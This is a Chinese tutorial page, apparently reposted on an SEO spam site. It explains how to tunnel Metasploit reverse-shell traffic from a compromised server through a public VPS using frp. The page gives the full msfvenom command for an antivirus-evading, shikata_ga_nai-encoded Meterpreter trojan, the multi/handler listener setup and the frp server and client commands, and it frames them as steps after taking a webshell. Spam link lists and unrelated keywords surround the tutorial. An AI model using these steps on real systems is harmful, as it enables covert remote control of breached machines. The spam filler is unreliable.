当前位置: 首页 > wzjs >正文

成都网站建设哪家公司好wordpress 直排主题

成都网站建设哪家公司好,wordpress 直排主题,网站推广服务怎么做,怎么创建企业邮箱代理 代理使用场景 拿下远程web服务器webshell连接不稳定,需要使用稳定的木马程序远程服务器无法直接连接攻击者电脑(内网IP)需要借助公网vps转发来自失陷服务器的木马流量借助frp服务器(vps)和客户端(内…

代理

代理使用场景

  1. 拿下远程web服务器
  2. webshell连接不稳定,需要使用稳定的木马程序
  3. 远程服务器无法直接连接攻击者电脑(内网IP)
  4. 需要借助公网vps转发来自失陷服务器的木马流量
  5. 借助frp服务器(vps)和客户端(内网攻击者)建立隧道
  6. 当vps某一个端口收到流量的时候,frps会根据提前和frpc约定好的规则,使用建立好的隧道转发流量

前提条件

攻击者:

  • 拿下了一台webshell权限
  • 需要上传完整功能的木马
  • 生成一个木马,不管谁执行了这个木马,都会连接vps的4444端口发送流量

代理过程

image-20231013203408275

隧道

失陷主机或服务器:

  • 在执行攻击者上传的木马时主动与vps进行连接
  • 请求与vps的4444端口进行通信,发送流量

公网vps:

  • 攻击者可控
  • 攻击者和受害服务器都可以访问
  • vps使用7000端口(frp软件)进行监听,攻击者向vps发出请求建立隧道(只能由攻击者向vps发出请求,因为公网IP不能访问私网IP)
  • 失陷主机运行木马后,失陷主机将信息通过4444端口传送至vps,vps把自己的4444端口的流量通过7000端口转发给攻击者

frp服务

frp存在客户端和服务端,frp服务运行起来后服务端会自行开放7000端口。

  • 内网kali用户上配置frpc客户端

  • vps7.7.7.7上配置frps服务端

  • frps和frpc做好链接后内网IP和vps7.7.7.7就建立了一个隧道

  • frp服务(vps)的4444端口会主动转发(通过7000端口)给客户端设定接收流量的端口

内网IP查看能否与外网通信

image-20231013202952351

image-20231013202942155

MSF木马生成

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.9.75.223 LPORT=4444 -e x86/shikata_ga_nai -f exe -o shell.exe -i 5

解释:

这是一个使用Metasploit框架中的msfvenom工具生成恶意软件的命令。

  • -p :指定Payload(有效负载:木马的功能点)为Windows Meterpreter反向TCP连接。Meterpreter是Metasploit框架中一个功能强大的远程访问工具。
  • LHOST:设置本地监听IP地址为10.9.75.223。这是恶意软件将连接到的主机IP地址。
  • LPORT:设置本地监听端口号为4444。这是恶意软件将连接到的主机端口号。
  • -e :使用x86/shikata_ga_nai编码来混淆Payload,以避免被基于特征的防病毒软件检测。
  • -f :设置生成的恶意软件文件格式为可执行文件(exe)。
  • -o :指定生成的恶意软件文件名为shell.exe。
  • -i :设置编码迭代次数为5,以增加避免被检测的难度。

木马上传至失陷主机

image-20231013210028793

image-20231013210045558

监听

1、启动msf :msfconsole
2、载入监控模块  :use exploit/multi/handler
3、加载payload:
set payload windows/meterpreter/reverse_tcp
set lhost 127.0.0.1
set lport 4444
run

image-20231013211002873

image-20231013211044543

image-20231013211350995

kali主机启动监听等待木马连接

失陷主机运行木马后将流量数据包发送给vps的4444端口,但是vps没有开放4444端口

image-20231013211818294

vps开启frp服务:

frp服务端

image-20231013212051157

查看frp服务端的配置文件,当启动frp服务端的时候默认开启7000端口和客户端连接。向客户端发流量数据包。

image-20231013212401559

在frps.exe所在文件打开cmd

frps.exe -c frps.ini	#启动frp服务器

image-20231013212818486

frp客户端:

解压frp客户端压缩包

tar xf frp_0.33.0_linux_amd64.tar.gz

image-20231013213128458

进入frp_0.33.0_linux_amd64目录查看客户端配置信息

cd frp_0.33.0_linux_amd64
ls
sudo vim frpc.ini

image-20231013214823409

启动frp客户端(frpc)

sudo ./frpc -c frpc.ini		#启动客户端

image-20231013215101685

image-20231013215649015

运行木马

失陷主机运行木马

image-20231013220215872

image-20231013220244608

打开生成木马界面获得shell

image-20231013220330963

image-20231013220424012


文章转载自:

http://lDYOYz7X.fkmrj.cn
http://Woo79CzZ.fkmrj.cn
http://5GOxRiRP.fkmrj.cn
http://Um6g1EFj.fkmrj.cn
http://OLL32BNy.fkmrj.cn
http://cYnTCDN1.fkmrj.cn
http://RJNaoA9T.fkmrj.cn
http://LtjLWIqK.fkmrj.cn
http://u77AJXLb.fkmrj.cn
http://QsGPrdIJ.fkmrj.cn
http://RDrp2Yqx.fkmrj.cn
http://Fs6tzkZQ.fkmrj.cn
http://dcn0DjS1.fkmrj.cn
http://vPOazHnr.fkmrj.cn
http://yJjvHbIg.fkmrj.cn
http://31Uqn3xW.fkmrj.cn
http://bBvhhJjU.fkmrj.cn
http://1JJ8PLC5.fkmrj.cn
http://CPE1ECKt.fkmrj.cn
http://GXuiFCMP.fkmrj.cn
http://30rJC8tz.fkmrj.cn
http://QPF1uPE9.fkmrj.cn
http://67DBUwoI.fkmrj.cn
http://x0E7SN0n.fkmrj.cn
http://3xSpDA9d.fkmrj.cn
http://NAbBvjlt.fkmrj.cn
http://7Zvip6yw.fkmrj.cn
http://D99FD6XU.fkmrj.cn
http://4D1QnGaQ.fkmrj.cn
http://d3irc6GB.fkmrj.cn
http://www.dtcms.com/wzjs/707248.html

相关文章:

  • 建材企业网站营销怎么做承德建设网站
  • 宁波做网站定制沈阳医大一医院男科咨询
  • 网站发布平台wordpress侧边栏加速
  • 北京三原色ps网站网站提交收录
  • 长沙中建设计院网站两个WordPress内容同步
  • 临沂网站制wordpress 获取tag名
  • 合肥市建设局网站官网cms
  • 怎么找上海网站建设郑州市建网站
  • 网站有域名没备案电脑仓库管理软件
  • 网站建设公司广州关键词seo是什么
  • 西方设计网站wordpress 无标题
  • 没有域名怎么搭建网站网站做销售是斤么工作
  • 网站专题栏目策划方案微信营销典型案例
  • 网站推广策略和营销策略贸易网站开发
  • 美食类网站开发需求句容网站制作哪家好
  • 了解互联网 网站在网站中设置网站地图
  • 微网站 微官网的区别昆明门户网站建设
  • 网站制作哪家好wordpress 标题图片
  • 电子商务网站建设费用做网站做的
  • 宜昌十堰网站建设哪家好用asp做网站系统步骤
  • 做美食如何加入团购网站软件编程培训
  • 公司的网站建设公司网站建设wordpress+视频边栏
  • 济南网站建设是什么品牌排行榜
  • 做网站的总结北京注册公司哪个区好
  • 资金盘网站建设蛋糕磨具网站开发背景
  • 长尾词挖掘工具seo查询官方网站
  • 电商推广方案广州网页seo排名
  • 图片墙网站代码可以做视频片头的网站
  • 网站开发一般用哪些语言类似于wordpress的网站
  • 太仓新网站优化可以申请微信号的网站